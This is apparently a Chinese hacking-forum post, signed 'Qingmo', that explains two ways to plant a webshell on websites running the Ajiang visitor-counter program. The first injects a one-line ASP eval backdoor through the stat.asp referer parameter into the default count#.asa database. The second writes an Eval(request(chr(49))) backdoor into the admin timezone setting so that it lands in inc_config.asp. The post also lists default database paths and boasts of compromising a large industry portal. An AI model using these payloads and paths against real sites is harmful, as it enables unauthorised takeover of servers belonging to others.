一般两种方法：
第一：
前提知道数据库路经，并且改成asp或asa后缀！阿江计数 程序，可以通过
http://网站 /stat.asp?style=text&referer=代码内容&screenwidth=1024
直 接提交，即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://网站 /count%23.asa访问得到webshell。
由于阿江计数程序过滤了%和+，将最小马改成
<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request(“1″))</SCRIPT>
替换代码 内容处提交，然后用一句话来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。某私服内的 啊江统计程序默认的数据库count#.asa
第二：
是进了后台拿shell ，一般有人进了后台不知道怎么搞！
那我情魔就分享下 在系统管理的全局选项中
有个2、服务器所在时区 在里面一般有个8 我们在后面写进 :Eval(request(chr(49)))
成 为 8:Eval(request(chr(49))) 这里49是对应的CHR码你也可以换其他的密码
49对应的是 1 密码就是 1 以前我好象也看到过:Eval(request(chr(112)))什么的 112是p
不过都是转载抄袭写的，写的不明白！
然 后确认修改 我们就用一经常话可以连接了地址是 count/inc_config.asp
http://www.XXX.com/count/inc_config.asp
就 这样OK了！….这方法我曾拿下全国阀门大型门户网..
以上作者：情魔
附：阿江部分默认数据库：count#.asa、#aj.asp（下 载时#号要改为%23）